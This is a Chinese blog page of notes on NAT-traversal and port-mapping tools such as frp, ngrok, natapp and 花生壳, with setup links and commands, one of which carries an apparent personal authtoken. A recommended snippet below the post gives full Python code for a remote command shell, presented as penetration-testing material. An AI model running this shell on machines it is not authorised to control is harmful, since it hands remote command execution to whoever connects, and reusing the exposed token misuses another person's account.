【内网穿刺】内网穿刺使用体验

本次部署使用Holer,成功内网穿刺。
https://github.com/wisdom-projects/holer

github已star

natapp
https://natapp.cn/article/natapp_newbie
运行指令 natapp -authtoken=1900eac06b5c849b
成功,网速ok,每次只能一小时

SSH内网穿刺
https://yangqiang.im/?p=698

EchoSite
https://www.echoseite.cn/
服务器价格实惠便宜,没试过部署


以下部署基于测试

一、IIS部署
IIS本身是部署静态文件,要想部署javaweb项目,要加jdk环境和tomcat环境,用开启IIS,用tomcat启动项目

部署项目
https://www.jianshu.com/p/4a9f2cb674ee

IIS+tomcat部署web项目
https://blog.csdn.net/hualele/article/details/79310823

二、花生壳部署

本地部署
然后通过花生壳里的内网穿刺80端口,将内网ip:端口映射到外网ip:端口,供公网访问
https://www.jianshu.com/p/252d6bc5fa86

三、frp内网穿刺

本地部署
内网穿刺,将内网ip:端口映射到外网ip:端口,供公网访问
http://www.voidcn.com/article/p-phgdyvfy-bob.html

使用frp实现内网穿刺
https://sunnyrx.com/2016/10/21/simple-to-use-frp/

frp公共服务器
http://www.frps.top/

四、购买阿里云服务器+域名
购买云服务器ESC,学生有套餐价

image.png

然后域名也有套餐价,第一年1元,域名可自己组合。

一分钟实现内网穿透(ngrok服务器搭建)
https://blog.csdn.net/zhangguo5/article/details/77848658

ngrok下载
https://ngrok.com/download
成功,仅可使用免费公共服务器,网速不行,使用指令,ngrok http 80

这里介绍的方法花生壳最为方便,但还尚未成功,什么报错都没有,frp和阿里云服务器最有可玩性,需要了解的很多。

强推linux系统,Ubuntu或者centOS7.0


如何建立自己的网站(博客)
https://www.jianshu.com/p/ed151681b067

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python 内网穿刺(Python reverse shell)是一种技术,用于在一个局域网中的计算机上远程执行命令。它通常用于网络安全测试和渗透测试中,以验证系统的安全性。 在 Python 中,可以使用 `socket` 模块来实现一个简单的内网穿刺工具。下面是一个简单的例子: ```python import socket import subprocess # 设置监听的本地 IP 和端口号 host = '192.168.1.100' port = 1234 # 创建 socket 对象 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 绑定 IP 和端口号 s.bind((host, port)) # 监听连接 s.listen(1) print(f"Listening on {host}:{port}...") # 接受连接 conn, addr = s.accept() print(f"Connected by {addr[0]}:{addr[1]}") # 循环接收和执行命令 while True: cmd = conn.recv(1024).decode() if cmd.lower() == 'exit': break output = subprocess.getoutput(cmd) conn.send(output.encode()) # 关闭连接 conn.close() ``` 以上代码是一个简单的服务器端程序,它会监听指定的 IP 和端口,接受客户端的连接,并将客户端发送的命令执行后返回结果。你可以将该代码保存为 `server.py` 并在服务器上运行。 客户端代码如下: ```python import socket # 设置服务器的 IP 和端口号 host = '192.168.1.100' port = 1234 # 创建 socket 对象 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 连接服务器 s.connect((host, port)) # 循环发送命令并接收结果 while True: cmd = input("Enter command (or 'exit' to quit): ") s.send(cmd.encode()) if cmd.lower() == 'exit': break output = s.recv(1024).decode() print(output) # 关闭连接 s.close() ``` 以上代码是一个简单的客户端程序,它会连接到指定的服务器 IP 和端口,并发送用户输入的命令,并打印服务器返回的结果。你可以将该代码保存为 `client.py` 并在客户端上运行。 需要注意的是,内网穿刺是一种潜在的安全风险,使用时需要谨慎,并确保在合法授权的范围内进行使用

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值